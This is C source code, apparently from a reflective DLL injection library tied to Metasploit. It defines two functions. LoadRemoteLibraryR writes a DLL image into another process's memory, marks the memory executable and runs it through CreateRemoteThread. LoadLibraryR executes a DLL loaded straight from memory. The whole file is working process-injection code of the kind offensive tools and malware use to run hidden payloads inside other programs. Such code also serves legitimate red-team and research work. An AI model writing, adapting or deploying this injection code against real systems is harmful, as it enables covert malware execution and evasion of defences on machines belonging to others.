//===============================================================================================// // Loads a PE image from memory into the address space of a host process via the image's exported ReflectiveLoader function // Note: You must compile whatever you are injecting with REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR // defined in order to use the correct RDI prototypes. // Note: The hProcess handle must have these access rights: PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | // PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ // Note: If you are passing in an lpParameter value, if it is a pointer, remember it is for a different address space. // Note: This function currently cant inject accross architectures, but only to architectures which are the // same as the arch this function is compiled as, e.g. x86->x86 and x64->x64 but not x64->x86 or x86->x64. HANDLE WINAPI LoadRemoteLibraryR( HANDLE hProcess, LPVOID lpBuffer, DWORD dwLength, LPVOID lpParameter ) { BOOL bSuccess = FALSE; LPVOID lpRemoteLibraryBuffer = NULL; LPTHREAD_START_ROUTINE lpReflectiveLoader = NULL; HANDLE hThread = NULL; DWORD dwReflectiveLoaderOffset = 0; DWORD dwThreadId = 0; __try { do { if( !hProcess || !lpBuffer || !dwLength ) break; // check if the library has a ReflectiveLoader... dwReflectiveLoaderOffset = GetReflectiveLoaderOffset( lpBuffer ); if( !dwReflectiveLoaderOffset ) break; // alloc memory (RWX) in the host process for the image... lpRemoteLibraryBuffer = VirtualAllocEx( hProcess, NULL, dwLength, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE ); if( !lpRemoteLibraryBuffer ) break; // write the image into the host process... if( !WriteProcessMemory( hProcess, lpRemoteLibraryBuffer, lpBuffer, dwLength, NULL ) ) break; // add the offset to ReflectiveLoader() to the remote library address... lpReflectiveLoader = (LPTHREAD_START_ROUTINE)( (ULONG_PTR)lpRemoteLibraryBuffer + dwReflectiveLoaderOffset ); // create a remote thread in the host process to call the ReflectiveLoader! hThread = CreateRemoteThread( hProcess, NULL, 1024*1024, lpReflectiveLoader, lpParameter, (DWORD)NULL, &dwThreadId ); } while( 0 ); } __except( EXCEPTION_EXECUTE_HANDLER ) { hThread = NULL; } return hThread; }
//===============================================================================================// // Loads a DLL image from memory via its exported ReflectiveLoader function HMODULE WINAPI LoadLibraryR(LPVOID lpBuffer, DWORD dwLength) { HMODULE hResult = NULL; DWORD dwReflectiveLoaderOffset = 0; DWORD dwOldProtect1 = 0; DWORD dwOldProtect2 = 0; REFLECTIVELOADER pReflectiveLoader = NULL; DLLMAIN pDllMain = NULL; if (lpBuffer == NULL || dwLength == 0) return NULL; __try { // check if the library has a ReflectiveLoader... dwReflectiveLoaderOffset = GetReflectiveLoaderOffset(lpBuffer); if (dwReflectiveLoaderOffset != 0) { pReflectiveLoader = (REFLECTIVELOADER)((UINT_PTR)lpBuffer + dwReflectiveLoaderOffset); // we must VirtualProtect the buffer to RWX so we can execute the ReflectiveLoader... // this assumes lpBuffer is the base address of the region of pages and dwLength the size of the region if (VirtualProtect(lpBuffer, dwLength, PAGE_EXECUTE_READWRITE, &dwOldProtect1)) { // call the librarys ReflectiveLoader... pDllMain = (DLLMAIN)pReflectiveLoader(); if (pDllMain != NULL) { // call the loaded librarys DllMain to get its HMODULE // Dont call DLL_METASPLOIT_ATTACH/DLL_METASPLOIT_DETACH as that is for payloads only. if (!pDllMain(NULL, DLL_QUERY_HMODULE, &hResult)) hResult = NULL; } // revert to the previous protection flags... //VirtualProtect(lpBuffer, dwLength, dwOldProtect1, &dwOldProtect2); } } } __except (EXCEPTION_EXECUTE_HANDLER) { hResult = NULL; } return hResult; }